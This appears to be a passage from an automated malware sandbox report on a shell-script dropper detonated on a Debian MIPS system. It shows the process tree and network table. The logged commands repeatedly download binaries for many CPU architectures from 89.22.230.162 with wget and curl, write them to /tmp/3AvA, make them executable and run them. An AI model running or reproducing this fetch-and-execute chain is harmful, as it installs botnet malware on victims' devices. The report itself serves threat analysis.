[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto Connections
NL 89.22.230.162:80 N/A tcp 20

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

debian9-mipsel-20240226-en

Max time kernel

79s

Max time network

83s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (10 identical rows, one per chmod +x invocation)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A (10 identical rows, one ./3AvA <tag> execution per architecture)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (10 identical rows, one per curl invocation; the TLS library curl loads checks the kernel FIPS-mode switch at start-up, so this is tool noise rather than sample behaviour)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto Connections
NL 89.22.230.162:80 N/A tcp 20

Files

N/A